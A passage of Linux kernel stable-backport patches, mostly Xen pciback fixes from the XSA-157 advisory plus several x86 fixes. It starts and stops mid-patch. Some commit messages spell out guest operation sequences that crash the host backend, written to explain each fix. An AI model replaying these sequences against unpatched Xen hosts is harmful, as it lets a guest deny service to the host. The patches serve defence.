struct xen_pcibk_device { struct xen_pci_sharedinfo *sh_info; unsigned long flags; struct work_struct op_work; + struct xen_pci_op op; }; struct xen_pcibk_dev_data { diff --git a/drivers/xen/xen-pciback/pciback_ops.c b/drivers/xen/xen-pciback/pciback_ops.c index b98cf0c3572..32f83f01966 100644 --- a/drivers/xen/xen-pciback/pciback_ops.c +++ b/drivers/xen/xen-pciback/pciback_ops.c @@ -295,9 +295,11 @@ void xen_pcibk_do_op(struct work_struct *data) container_of(data, struct xen_pcibk_device, op_work); struct pci_dev *dev; struct xen_pcibk_dev_data *dev_data = NULL; - struct xen_pci_op *op = &pdev->sh_info->op; + struct xen_pci_op *op = &pdev->op; int test_intx = 0; + *op = pdev->sh_info->op; + barrier(); dev = xen_pcibk_get_pci_dev(pdev, op->domain, op->bus, op->devfn); if (dev == NULL) @@ -339,6 +341,17 @@ void xen_pcibk_do_op(struct work_struct *data) if ((dev_data->enable_intx != test_intx)) xen_pcibk_control_isr(dev, 0 /* no reset */); } + pdev->sh_info->op.err = op->err; + pdev->sh_info->op.value = op->value; +#ifdef CONFIG_PCI_MSI + if (op->cmd == XEN_PCI_OP_enable_msix && op->err == 0) { + unsigned int i; + + for (i = 0; i < op->value; i++) + pdev->sh_info->op.msix_entries[i].vector = + op->msix_entries[i].vector; + } +#endif /* Tell the driver domain that we're done. */ wmb(); clear_bit(_XEN_PCIF_active, (unsigned long *)&pdev->sh_info->flags); From 2801814294bae5fd16ac07822a0e074b7e188f52 Mon Sep 17 00:00:00 2001 From: Konrad Rzeszutek Wilk Date: Thu, 11 Feb 2016 16:10:24 -0500 Subject: [PATCH 038/315] xen/pciback: Save the number of MSI-X entries to be copied later. commit d159457b84395927b5a52adb72f748dd089ad5e5 upstream. Commit 8135cf8b092723dbfcc611fe6fdcb3a36c9951c5 (xen/pciback: Save xen_pci_op commands before processing it) broke enabling MSI-X because it would never copy the resulting vectors into the response. The number of vectors requested was being overwritten by the return value (typically zero for success). Save the number of vectors before processing the op, so the correct number of vectors are copied afterwards. Signed-off-by: Konrad Rzeszutek Wilk Cc: Reviewed-by: Jan Beulich Signed-off-by: David Vrabel Cc: Konrad Rzeszutek Wilk Signed-off-by: Willy Tarreau --- drivers/xen/xen-pciback/pciback_ops.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/xen/xen-pciback/pciback_ops.c b/drivers/xen/xen-pciback/pciback_ops.c index 32f83f01966..2c668b7f20a 100644 --- a/drivers/xen/xen-pciback/pciback_ops.c +++ b/drivers/xen/xen-pciback/pciback_ops.c @@ -297,6 +297,9 @@ void xen_pcibk_do_op(struct work_struct *data) struct xen_pcibk_dev_data *dev_data = NULL; struct xen_pci_op *op = &pdev->op; int test_intx = 0; +#ifdef CONFIG_PCI_MSI + unsigned int nr = 0; +#endif *op = pdev->sh_info->op; barrier(); @@ -325,6 +328,7 @@ void xen_pcibk_do_op(struct work_struct *data) op->err = xen_pcibk_disable_msi(pdev, dev, op); break; case XEN_PCI_OP_enable_msix: + nr = op->value; op->err = xen_pcibk_enable_msix(pdev, dev, op); break; case XEN_PCI_OP_disable_msix: @@ -347,7 +351,7 @@ void xen_pcibk_do_op(struct work_struct *data) if (op->cmd == XEN_PCI_OP_enable_msix && op->err == 0) { unsigned int i; - for (i = 0; i < op->value; i++) + for (i = 0; i < nr; i++) pdev->sh_info->op.msix_entries[i].vector = op->msix_entries[i].vector; } From 871e37be4fe84ec58c33116701b740c6cf675f50 Mon Sep 17 00:00:00 2001 From: Konrad Rzeszutek Wilk Date: Fri, 3 Apr 2015 11:08:22 -0400 Subject: [PATCH 039/315] xen/pciback: Return error on XEN_PCI_OP_enable_msi when device has MSI or MSI-X enabled commit 56441f3c8e5bd45aab10dd9f8c505dd4bec03b0d upstream. The guest sequence of: a) XEN_PCI_OP_enable_msi b) XEN_PCI_OP_enable_msi c) XEN_PCI_OP_disable_msi results in hitting an BUG_ON condition in the msi.c code. The MSI code uses an dev->msi_list to which it adds MSI entries. Under the above conditions an BUG_ON() can be hit. The device passed in the guest MUST have MSI capability. The a) adds the entry to the dev->msi_list and sets msi_enabled. The b) adds a second entry but adding in to SysFS fails (duplicate entry) and deletes all of the entries from msi_list and returns (with msi_enabled is still set). c) pci_disable_msi passes the msi_enabled checks and hits: BUG_ON(list_empty(dev_to_msi_list(&dev->dev))); and blows up. The patch adds a simple check in the XEN_PCI_OP_enable_msi to guard against that. The check for msix_enabled is not stricly neccessary. This is part of XSA-157. Reviewed-by: David Vrabel Reviewed-by: Jan Beulich Signed-off-by: Konrad Rzeszutek Wilk Signed-off-by: Willy Tarreau --- drivers/xen/xen-pciback/pciback_ops.c | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/drivers/xen/xen-pciback/pciback_ops.c b/drivers/xen/xen-pciback/pciback_ops.c index 2c668b7f20a..27c8ff5fea5 100644 --- a/drivers/xen/xen-pciback/pciback_ops.c +++ b/drivers/xen/xen-pciback/pciback_ops.c @@ -141,7 +141,12 @@ int xen_pcibk_enable_msi(struct xen_pcibk_device *pdev, if (unlikely(verbose_request)) printk(KERN_DEBUG DRV_NAME ": %s: enable MSI\n", pci_name(dev)); - status = pci_enable_msi(dev); + if (dev->msi_enabled) + status = -EALREADY; + else if (dev->msix_enabled) + status = -ENXIO; + else + status = pci_enable_msi(dev); if (status) { pr_warn_ratelimited(DRV_NAME ": %s: error enabling MSI for guest %u: err %d\n", From d2dfdbabdd47195c766e58f6455cf51b924e32ad Mon Sep 17 00:00:00 2001 From: Konrad Rzeszutek Wilk Date: Mon, 2 Nov 2015 18:07:44 -0500 Subject: [PATCH 040/315] xen/pciback: Return error on XEN_PCI_OP_enable_msix when device has MSI or MSI-X enabled commit 5e0ce1455c09dd61d029b8ad45d82e1ac0b6c4c9 upstream. The guest sequence of: a) XEN_PCI_OP_enable_msix b) XEN_PCI_OP_enable_msix results in hitting an NULL pointer due to using freed pointers. The device passed in the guest MUST have MSI-X capability. The a) constructs and SysFS representation of MSI and MSI groups. The b) adds a second set of them but adding in to SysFS fails (duplicate entry). 'populate_msi_sysfs' frees the newly allocated msi_irq_groups (note that in a) pdev->msi_irq_groups is still set) and also free's ALL of the MSI-X entries of the device (the ones allocated in step a) and b)). The unwind code: 'free_msi_irqs' deletes all the entries and tries to delete the pdev->msi_irq_groups (which hasn't been set to NULL). However the pointers in the SysFS are already freed and we hit an NULL pointer further on when 'strlen' is attempted on a freed pointer. The patch adds a simple check in the XEN_PCI_OP_enable_msix to guard against that. The check for msi_enabled is not stricly neccessary. This is part of XSA-157 Reviewed-by: David Vrabel Reviewed-by: Jan Beulich Signed-off-by: Konrad Rzeszutek Wilk Signed-off-by: Willy Tarreau --- drivers/xen/xen-pciback/pciback_ops.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/drivers/xen/xen-pciback/pciback_ops.c b/drivers/xen/xen-pciback/pciback_ops.c index 27c8ff5fea5..741fd04d5f8 100644 --- a/drivers/xen/xen-pciback/pciback_ops.c +++ b/drivers/xen/xen-pciback/pciback_ops.c @@ -203,9 +203,16 @@ int xen_pcibk_enable_msix(struct xen_pcibk_device *pdev, if (unlikely(verbose_request)) printk(KERN_DEBUG DRV_NAME ": %s: enable MSI-X\n", pci_name(dev)); + if (op->value > SH_INFO_MAX_VEC) return -EINVAL; + if (dev->msix_enabled) + return -EALREADY; + + if (dev->msi_enabled) + return -ENXIO; + entries = kmalloc(op->value * sizeof(*entries), GFP_KERNEL); if (entries == NULL) return -ENOMEM; From 5701f8a13c9bde54f047cfcad6f527e97eef6d4e Mon Sep 17 00:00:00 2001 From: Konrad Rzeszutek Wilk Date: Mon, 2 Nov 2015 17:24:08 -0500 Subject: [PATCH 041/315] xen/pciback: Do not install an IRQ handler for MSI interrupts. commit a396f3a210c3a61e94d6b87ec05a75d0be2a60d0 upstream. Otherwise an guest can subvert the generic MSI code to trigger an BUG_ON condition during MSI interrupt freeing: for (i = 0; i < entry->nvec_used; i++) BUG_ON(irq_has_action(entry->irq + i)); Xen PCI backed installs an IRQ handler (request_irq) for the dev->irq whenever the guest writes PCI_COMMAND_MEMORY (or PCI_COMMAND_IO) to the PCI_COMMAND register. This is done in case the device has legacy interrupts the GSI line is shared by the backend devices. To subvert the backend the guest needs to make the backend to change the dev->irq from the GSI to the MSI interrupt line, make the backend allocate an interrupt handler, and then command the backend to free the MSI interrupt and hit the BUG_ON. Since the backend only calls 'request_irq' when the guest writes to the PCI_COMMAND register the guest needs to call XEN_PCI_OP_enable_msi before any other operation. This will cause the generic MSI code to setup an MSI entry and populate dev->irq with the new PIRQ value. Then the guest can write to PCI_COMMAND PCI_COMMAND_MEMORY and cause the backend to setup an IRQ handler for dev->irq (which instead of the GSI value has the MSI pirq). See 'xen_pcibk_control_isr'. Then the guest disables the MSI: XEN_PCI_OP_disable_msi which ends up triggering the BUG_ON condition in 'free_msi_irqs' as there is an IRQ handler for the entry->irq (dev->irq). Note that this cannot be done using MSI-X as the generic code does not over-write dev->irq with the MSI-X PIRQ values. The patch inhibits setting up the IRQ handler if MSI or MSI-X (for symmetry reasons) code had been called successfully. P.S. Xen PCIBack when it sets up the device for the guest consumption ends up writting 0 to the PCI_COMMAND (see xen_pcibk_reset_device). XSA-120 addendum patch removed that - however when upstreaming said addendum we found that it caused issues with qemu upstream. That has now been fixed in qemu upstream. This is part of XSA-157 Reviewed-by: David Vrabel Signed-off-by: Konrad Rzeszutek Wilk Signed-off-by: Willy Tarreau --- drivers/xen/xen-pciback/pciback_ops.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/drivers/xen/xen-pciback/pciback_ops.c b/drivers/xen/xen-pciback/pciback_ops.c index 741fd04d5f8..ad5f12e4063 100644 --- a/drivers/xen/xen-pciback/pciback_ops.c +++ b/drivers/xen/xen-pciback/pciback_ops.c @@ -67,6 +67,13 @@ static void xen_pcibk_control_isr(struct pci_dev *dev, int reset) enable ? "enable" : "disable"); if (enable) { + /* + * The MSI or MSI-X should not have an IRQ handler. Otherwise + * if the guest terminates we BUG_ON in free_msi_irqs. + */ + if (dev->msi_enabled || dev->msix_enabled) + goto out; + rc = request_irq(dev_data->irq, xen_pcibk_guest_interrupt, IRQF_SHARED, dev_data->irq_name, dev); From 4c2e2fd22095d210b8ec2db4f82cdd0a1c8e49a6 Mon Sep 17 00:00:00 2001 From: Konrad Rzeszutek Wilk Date: Wed, 1 Apr 2015 10:49:47 -0400 Subject: [PATCH 042/315] xen/pciback: For XEN_PCI_OP_disable_msi[|x] only disable if device has MSI(X) enabled. commit 7cfb905b9638982862f0331b36ccaaca5d383b49 upstream. Otherwise just continue on, returning the same values as previously (return of 0, and op->result has the PIRQ value). This does not change the behavior of XEN_PCI_OP_disable_msi[|x]. The pci_disable_msi or pci_disable_msix have the checks for msi_enabled or msix_enabled so they will error out immediately. However the guest can still call these operations and cause us to disable the 'ack_intr'. That means the backend IRQ handler for the legacy interrupt will not respond to interrupts anymore. This will lead to (if the device is causing an interrupt storm) for the Linux generic code to disable the interrupt line. Naturally this will only happen if the device in question is plugged in on the motherboard on shared level interrupt GSI. This is part of XSA-157 Reviewed-by: David Vrabel Signed-off-by: Konrad Rzeszutek Wilk Signed-off-by: Willy Tarreau --- drivers/xen/xen-pciback/pciback_ops.c | 33 ++++++++++++++++----------- 1 file changed, 20 insertions(+), 13 deletions(-) diff --git a/drivers/xen/xen-pciback/pciback_ops.c b/drivers/xen/xen-pciback/pciback_ops.c index ad5f12e4063..cd1481a53ef 100644 --- a/drivers/xen/xen-pciback/pciback_ops.c +++ b/drivers/xen/xen-pciback/pciback_ops.c @@ -182,20 +182,23 @@ static int xen_pcibk_disable_msi(struct xen_pcibk_device *pdev, struct pci_dev *dev, struct xen_pci_op *op) { - struct xen_pcibk_dev_data *dev_data; - if (unlikely(verbose_request)) printk(KERN_DEBUG DRV_NAME ": %s: disable MSI\n", pci_name(dev)); - pci_disable_msi(dev); + if (dev->msi_enabled) { + struct xen_pcibk_dev_data *dev_data; + + pci_disable_msi(dev); + + dev_data = pci_get_drvdata(dev); + if (dev_data) + dev_data->ack_intr = 1; + } op->value = dev->irq ? xen_pirq_from_irq(dev->irq) : 0; if (unlikely(verbose_request)) printk(KERN_DEBUG DRV_NAME ": %s: MSI: %d\n", pci_name(dev), op->value); - dev_data = pci_get_drvdata(dev); - if (dev_data) - dev_data->ack_intr = 1; return 0; } @@ -261,23 +264,27 @@ static int xen_pcibk_disable_msix(struct xen_pcibk_device *pdev, struct pci_dev *dev, struct xen_pci_op *op) { - struct xen_pcibk_dev_data *dev_data; if (unlikely(verbose_request)) printk(KERN_DEBUG DRV_NAME ": %s: disable MSI-X\n", pci_name(dev)); - pci_disable_msix(dev); + if (dev->msix_enabled) { + struct xen_pcibk_dev_data *dev_data; + + pci_disable_msix(dev); + + dev_data = pci_get_drvdata(dev); + if (dev_data) + dev_data->ack_intr = 1; + } /* * SR-IOV devices (which don't have any legacy IRQ) have * an undefined IRQ value of zero. */ op->value = dev->irq ? xen_pirq_from_irq(dev->irq) : 0; if (unlikely(verbose_request)) - printk(KERN_DEBUG DRV_NAME ": %s: MSI-X: %d\n", pci_name(dev), - op->value); - dev_data = pci_get_drvdata(dev); - if (dev_data) - dev_data->ack_intr = 1; + printk(KERN_DEBUG DRV_NAME ": %s: MSI-X: %d\n", + pci_name(dev), op->value); return 0; } #endif From 1d9d642c16d2bd551f74a77901066d1ce2541768 Mon Sep 17 00:00:00 2001 From: Konrad Rzeszutek Wilk Date: Mon, 2 Nov 2015 18:13:27 -0500 Subject: [PATCH 043/315] xen/pciback: Don't allow MSI-X ops if PCI_COMMAND_MEMORY is not set. commit 408fb0e5aa7fda0059db282ff58c3b2a4278baa0 upstream. commit f598282f51 ("PCI: Fix the NIU MSI-X problem in a better way") teaches us that dealing with MSI-X can be troublesome. Further checks in the MSI-X architecture shows that if the PCI_COMMAND_MEMORY bit is turned of in the PCI_COMMAND we may not be able to access the BAR (since they are memory regions). Since the MSI-X tables are located in there.. that can lead to us causing PCIe errors. Inhibit us performing any operation on the MSI-X unless the MEMORY bit is set. Note that Xen hypervisor with: "x86/MSI-X: access MSI-X table only after having enabled MSI-X" will return: xen_pciback: 0000:0a:00.1: error -6 enabling MSI-X for guest 3! When the generic MSI code tries to setup the PIRQ without MEMORY bit set. Which means with later versions of Xen (4.6) this patch is not neccessary. This is part of XSA-157 Reviewed-by: Jan Beulich Signed-off-by: Konrad Rzeszutek Wilk Signed-off-by: Willy Tarreau --- drivers/xen/xen-pciback/pciback_ops.c | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/drivers/xen/xen-pciback/pciback_ops.c b/drivers/xen/xen-pciback/pciback_ops.c index cd1481a53ef..6c17f92341f 100644 --- a/drivers/xen/xen-pciback/pciback_ops.c +++ b/drivers/xen/xen-pciback/pciback_ops.c @@ -209,6 +209,7 @@ int xen_pcibk_enable_msix(struct xen_pcibk_device *pdev, struct xen_pcibk_dev_data *dev_data; int i, result; struct msix_entry *entries; + u16 cmd; if (unlikely(verbose_request)) printk(KERN_DEBUG DRV_NAME ": %s: enable MSI-X\n", @@ -220,7 +221,12 @@ int xen_pcibk_enable_msix(struct xen_pcibk_device *pdev, if (dev->msix_enabled) return -EALREADY; - if (dev->msi_enabled) + /* + * PCI_COMMAND_MEMORY must be enabled, otherwise we may not be able + * to access the BARs where the MSI-X entries reside. + */ + pci_read_config_word(dev, PCI_COMMAND, &cmd); + if (dev->msi_enabled || !(cmd & PCI_COMMAND_MEMORY)) return -ENXIO; entries = kmalloc(op->value * sizeof(*entries), GFP_KERNEL); From f014225af8ed6adf75035e9dd76d82874854bf0f Mon Sep 17 00:00:00 2001 From: Ben Hutchings Date: Mon, 13 Apr 2015 00:26:35 +0100 Subject: [PATCH 044/315] xen-pciback: Add name prefix to global 'permissive' variable commit 8014bcc86ef112eab9ee1db312dba4e6b608cf89 upstream. The variable for the 'permissive' module parameter used to be static but was recently changed to be extern. This puts it in the kernel global namespace if the driver is built-in, so its name should begin with a prefix identifying the driver. Signed-off-by: Ben Hutchings Fixes: af6fc858a35b ("xen-pciback: limit guest control of command register") Signed-off-by: David Vrabel Signed-off-by: Willy Tarreau --- drivers/xen/xen-pciback/conf_space.c | 6 +++--- drivers/xen/xen-pciback/conf_space.h | 2 +- drivers/xen/xen-pciback/conf_space_header.c | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/drivers/xen/xen-pciback/conf_space.c b/drivers/xen/xen-pciback/conf_space.c index ba3fac8318b..47a4177b16d 100644 --- a/drivers/xen/xen-pciback/conf_space.c +++ b/drivers/xen/xen-pciback/conf_space.c @@ -16,8 +16,8 @@ #include "conf_space.h" #include "conf_space_quirks.h" -bool permissive; -module_param(permissive, bool, 0644); +bool xen_pcibk_permissive; +module_param_named(permissive, xen_pcibk_permissive, bool, 0644); /* This is where xen_pcibk_read_config_byte, xen_pcibk_read_config_word, * xen_pcibk_write_config_word, and xen_pcibk_write_config_byte are created. */ @@ -260,7 +260,7 @@ int xen_pcibk_config_write(struct pci_dev *dev, int offset, int size, u32 value) * This means that some fields may still be read-only because * they have entries in the config_field list that intercept * the write and do nothing. */ - if (dev_data->permissive || permissive) { + if (dev_data->permissive || xen_pcibk_permissive) { switch (size) { case 1: err = pci_write_config_byte(dev, offset, diff --git a/drivers/xen/xen-pciback/conf_space.h b/drivers/xen/xen-pciback/conf_space.h index 2e1d73d1d5d..62461a8ba1d 100644 --- a/drivers/xen/xen-pciback/conf_space.h +++ b/drivers/xen/xen-pciback/conf_space.h @@ -64,7 +64,7 @@ struct config_field_entry { void *data; }; -extern bool permissive; +extern bool xen_pcibk_permissive; #define OFFSET(cfg_entry) ((cfg_entry)->base_offset+(cfg_entry)->field->offset) diff --git a/drivers/xen/xen-pciback/conf_space_header.c b/drivers/xen/xen-pciback/conf_space_header.c index a5bb81a600f..1667a9089a4 100644 --- a/drivers/xen/xen-pciback/conf_space_header.c +++ b/drivers/xen/xen-pciback/conf_space_header.c @@ -105,7 +105,7 @@ static int command_write(struct pci_dev *dev, int offset, u16 value, void *data) cmd->val = value; - if (!permissive && (!dev_data || !dev_data->permissive)) + if (!xen_pcibk_permissive && (!dev_data || !dev_data->permissive)) return 0; /* Only allow the guest to control certain bits. */ From 506750b71b422b278be54a4645414affc7bf19d5 Mon Sep 17 00:00:00 2001 From: Juergen Gross Date: Thu, 23 Jun 2016 07:12:27 +0200 Subject: [PATCH 045/315] x86/xen: fix upper bound of pmd loop in xen_cleanhighmap() commit 1cf38741308c64d08553602b3374fb39224eeb5a upstream. xen_cleanhighmap() is operating on level2_kernel_pgt only. The upper bound of the loop setting non-kernel-image entries to zero should not exceed the size of level2_kernel_pgt. Reported-by: Linus Torvalds Signed-off-by: Juergen Gross Signed-off-by: David Vrabel Signed-off-by: Willy Tarreau --- arch/x86/xen/mmu.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/x86/xen/mmu.c b/arch/x86/xen/mmu.c index fdc3ba28ca3..53b061c9ad7 100644 --- a/arch/x86/xen/mmu.c +++ b/arch/x86/xen/mmu.c @@ -1187,7 +1187,7 @@ static void __init xen_cleanhighmap(unsigned long vaddr, /* NOTE: The loop is more greedy than the cleanup_highmap variant. * We include the PMD passed in on _both_ boundaries. */ - for (; vaddr <= vaddr_end && (pmd < (level2_kernel_pgt + PAGE_SIZE)); + for (; vaddr <= vaddr_end && (pmd < (level2_kernel_pgt + PTRS_PER_PMD)); pmd++, vaddr += PMD_SIZE) { if (pmd_none(*pmd)) continue; From 213060d93a85fb36b0f5eefed6111b0b89c63433 Mon Sep 17 00:00:00 2001 From: Andy Lutomirski Date: Thu, 1 Dec 2016 09:26:42 -0800 Subject: [PATCH 046/315] x86/traps: Ignore high word of regs->cs in early_idt_handler_common This is a backport of: commit fc0e81b2bea0ebceb71889b61d2240856141c9ee upstream On the 80486 DX, it seems that some exceptions may leave garbage in the high bits of CS. This causes sporadic failures in which early_fixup_exception() refuses to fix up an exception. As far as I can tell, this has been buggy for a long time, but the problem seems to have been exacerbated by commits: 1e02ce4cccdc ("x86: Store a per-cpu shadow copy of CR4") e1bfc11c5a6f ("x86/init: Fix cr4_init_shadow() on CR4-less machines") This appears to have broken for as long as we've had early exception handling. [ This backport should apply to kernels from 3.4 - 4.5. ] Fixes: 4c5023a3fa2e ("x86-32: Handle exception table entries during early boot") Cc: H. Peter Anvin Cc: stable@vger.kernel.org Reported-by: Matthew Whitehead Signed-off-by: Andy Lutomirski Signed-off-by: Willy Tarreau --- arch/x86/kernel/head_32.S | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/x86/kernel/head_32.S b/arch/x86/kernel/head_32.S index 8060c8b95b3..b7e330c57a4 100644 --- a/arch/x86/kernel/head_32.S +++ b/arch/x86/kernel/head_32.S @@ -586,7 +586,7 @@ early_idt_handler_common: movl %eax,%ds movl %eax,%es - cmpl $(__KERNEL_CS),32(%esp) + cmpw $(__KERNEL_CS),32(%esp) jne 10f leal 28(%esp),%eax # Pointer to %eip From b591901eb885d9deaf74c088fd6c22f85511510a Mon Sep 17 00:00:00 2001 From: Sebastian Andrzej Siewior Date: Fri, 5 Aug 2016 15:37:39 +0200 Subject: [PATCH 047/315] x86/mm: Disable preemption during CR3 read+write MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 5cf0791da5c162ebc14b01eb01631cfa7ed4fa6e upstream. There's a subtle preemption race on UP kernels: Usually current->mm (and therefore mm->pgd) stays the same during the lifetime of a task so it does not matter if a task gets preempted during the read and write of the CR3. But then, there is this scenario on x86-UP: TaskA is in do_exit() and exit_mm() sets current->mm = NULL followed by: -> mmput() -> exit_mmap() -> tlb_finish_mmu() -> tlb_flush_mmu() -> tlb_flush_mmu_tlbonly() -> tlb_flush() -> flush_tlb_mm_range() -> __flush_tlb_up() -> __flush_tlb() -> __native_flush_tlb() At this point current->mm is NULL but current->active_mm still points to the "old" mm. Let's preempt taskA _after_ native_read_cr3() by taskB. TaskB has its own mm so CR3 has changed. Now preempt back to taskA. TaskA has no ->mm set so it borrows taskB's mm and so CR3 remains unchanged. Once taskA gets active it continues where it was interrupted and that means it writes its old CR3 value back. Everything is fine because userland won't need its memory anymore. Now the fun part: Let's preempt taskA one more time and get back to taskB. This time switch_mm() won't do a thing because oldmm (->active_mm) is the same as mm (as per context_switch()). So we remain with a bad CR3 / PGD and return to userland. The next thing that happens is handle_mm_fault() with an address for the execution of its code in userland. handle_mm_fault() realizes that it has a PTE with proper rights so it returns doing nothing. But the CPU looks at the wrong PGD and insists that something is wrong and faults again. And again. And one more time… This pagefault circle continues until the scheduler gets tired of it and puts another task on the CPU. It gets little difficult if the task is a RT task with a high priority. The system will either freeze or it gets fixed by the software watchdog thread which usually runs at RT-max prio. But waiting for the watchdog will increase the latency of the RT task which is no good. Fix this by disabling preemption across the critical code section. Signed-off-by: Sebastian Andrzej Siewior Acked-by: Peter Zijlstra (Intel) Acked-by: Rik van Riel Acked-by: Andy Lutomirski Cc: Borislav Petkov Cc: Borislav Petkov Cc: Brian Gerst Cc: Denys Vlasenko Cc: H. Peter Anvin Cc: Josh Poimboeuf Cc: Linus Torvalds Cc: Mel Gorman Cc: Peter Zijlstra Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: linux-mm@kvack.org Link: http://lkml.kernel.org/r/1470404259-26290-1-git-send-email-bigeasy@linutronix.de [ Prettified the changelog. ] Signed-off-by: Ingo Molnar Signed-off-by: Willy Tarreau --- arch/x86/include/asm/tlbflush.h | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/arch/x86/include/asm/tlbflush.h b/arch/x86/include/asm/tlbflush.h index 50a7fc0f824..fb3285805be 100644 --- a/arch/x86/include/asm/tlbflush.h +++ b/arch/x86/include/asm/tlbflush.h @@ -17,7 +17,14 @@ static inline void __native_flush_tlb(void) { + /* + * If current->mm == NULL then we borrow a mm which may change during a + * task switch and therefore we must not be preempted while we write CR3 + * back: + */ + preempt_disable(); native_write_cr3(native_read_cr3()); + preempt_enable(); } static inline void __native_flush_tlb_global_irq_disabled(void) From 928a27752e51670cd282848e7cde8e2e1ac4ec19 Mon Sep 17 00:00:00 2001 From: Wanpeng Li Date: Tue, 23 Aug 2016 20:07:19 +0800 Subject: [PATCH 048/315] x86/apic: Do not init irq remapping if ioapic is disabled commit 2e63ad4bd5dd583871e6602f9d398b9322d358d9 upstream. native_smp_prepare_cpus -> default_setup_apic_routing -> enable_IR_x2apic -> irq_remapping_prepare -> intel_prepare_irq_remapping -> intel_setup_irq_remapping So IR table is setup even if "noapic" boot parameter is added. As a result we crash later when the interrupt affinity is set due to a half initialized remapping infrastructure. Prevent remap initialization when IOAPIC is disabled. Signed-off-by: Wanpeng Li Cc: Peter Zijlstra Cc: Joerg Roedel Link: http://lkml.kernel.org/r/1471954039-3942-1-git-send-email-wanpeng.li@hotmail.com Signed-off-by: Thomas Gleixner Signed-off-by: Willy Tarreau --- arch/x86/kernel/apic/apic.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/arch/x86/kernel/apic/apic.c b/arch/x86/kernel/apic/apic.c index 9620d18cb63..3cd8bfc3c4b 100644 --- a/arch/x86/kernel/apic/apic.c +++ b/arch/x86/kernel/apic/apic.c @@ -1581,6 +1581,9 @@ void __init enable_IR_x2apic(void) int ret, x2apic_enabled = 0; int hardware_init_ret; + if (skip_ioapic_setup) + return; + /* Make sure irq_remap_ops are initialized */ setup_irq_remapping_ops(); From 1eae225e4386ce577234130cd7d89cbc615b468d Mon Sep 17 00:00:00 2001 From: Jiri Kosina Date: Fri, 8 Jul 2016 11:38:28 +0200 Subject: [PATCH 049/315] x86/mm/pat, /dev/mem: Remove superfluous error message commit 39380b80d72723282f0ea1d1bbf2294eae45013e upstream. Currently it's possible for broken (or malicious) userspace to flood a kernel log indefinitely with messages a-la Program dmidecode tried to access /dev/mem between f0000->100000 because range_is_allowed() is case of CONFIG_STRICT_DEVMEM being turned on dumps this information each and every time devmem_is_allowed() fails. Reportedly userspace that is able to trigger contignuous flow of these messages exists. It would be possible to rate limit this message, but that'd have a questionable value; the administrator wouldn't get information about all the failing accessess, so then the information would be both superfluous and incomplete at the same time :) Returning EPERM (which is what is actually happening) is enough indication for userspace what has happened; no need to log this particular error as some sort of special condition. Signed-off-by: Jiri Kosina Cc: Andrew Morton Cc: Andy Lutomirski Cc: Borislav Petkov Cc: Brian Gerst Cc: Denys Vlasenko Cc: H. Peter Anvin Cc: Josh Poimboeuf Cc: Kees Cook Cc: Linus Torvalds Cc: Luis R. Rodriguez Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: Toshi Kani Link: http://lkml.kernel.org/r/alpine.LNX.2.00.1607081137020.24757@cbobk.fhfr.pm Signed-off-by: Ingo Molnar Signed-off-by: Willy Tarreau --- arch/x86/mm/pat.c | 5 +---- drivers/char/mem.c | 6 +----- 2 files changed, 2 insertions(+), 9 deletions(-) diff --git a/arch/x86/mm/pat.c b/arch/x86/mm/pat.c index 657438858e8..7f0c8da7ece 100644 --- a/arch/x86/mm/pat.c +++ b/arch/x86/mm/pat.c @@ -505,11 +505,8 @@ static inline int range_is_allowed(unsigned long pfn, unsigned long size) return 1; while (cursor < to) { - if (!devmem_is_allowed(pfn)) { - printk(KERN_INFO "Program %s tried to access /dev/mem between [mem %#010Lx-%#010Lx]\n", - current->comm, from, to - 1); + if (!devmem_is_allowed(pfn)) return 0; - } cursor += PAGE_SIZE; pfn++; } diff --git a/drivers/char/mem.c b/drivers/char/mem.c index 1ccbe9482fa..598ece77ee9 100644 --- a/drivers/char/mem.c +++ b/drivers/char/mem.c @@ -68,12 +68,8 @@ static inline int range_is_allowed(unsigned long pfn, unsigned long size) u64 cursor = from; while (cursor < to) { - if (!devmem_is_allowed(pfn)) { - printk(KERN_INFO - "Program %s tried to access /dev/mem between %Lx->%Lx.\n", - current->comm, from, to); + if (!devmem_is_allowed(pfn)) return 0; - } cursor += PAGE_SIZE; pfn++; } From 6523fa8c3451f903ee7feddfff18cd6763f804da Mon Sep 17 00:00:00 2001 From: Steven Rostedt Date: Wed, 25 May 2016 13:47:26 -0400 Subject: [PATCH 050/315] x86/paravirt: Do not trace _paravirt_ident_*() functions MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 15301a570754c7af60335d094dd2d1808b0641a5 upstream. Łukasz Daniluk reported that on a RHEL kernel that his machine would lock up after enabling function tracer. I asked him to bisect the functions within available_filter_functions, which he did and it came down to three: _paravirt_nop(), _paravirt_ident_32() and _paravirt_ident_64() It was found that this is only an issue when noreplace-paravirt is added to the kernel command line. This means that those functions are most likely called within critical sections of the funtion tracer, and must not be traced. In newer kenels _paravirt_nop() is defined within gcc asm(), and is no longer an issue. But both _paravirt_ident_{32,64}() causes the following splat when they are traced: mm/pgtable-generic.c:33: bad pmd ffff8800d2435150(0000000001d00054) mm/pgtable-generic.c:33: bad pmd ffff8800d3624190(0000000001d00070) mm/pgtable-generic.c:33: bad pmd ffff8800d36a5110(0000000001d00054) mm/pgtable-generic.c:33: bad pmd ffff880118eb1450(0000000001d00054) NMI watchdog: BUG: soft lockup - CPU#2 stuck for 22s! [systemd-journal:469] Modules linked in: e1000e CPU: 2 PID: 469 Comm: systemd-journal Not tainted 4.6.0-rc4-test+ #513 Hardware name: Hewlett-Packard HP Compaq Pro 6300 SFF/339A, BIOS K01 v02.05 05/07/2012 task: ffff880118f740c0 ti: ffff8800d4aec000 task.ti: ffff8800d4aec000 RIP: 0010:[] [] queued_spin_lock_slowpath+0x118/0x1a0 RSP: 0018:ffff8800d4aefb90 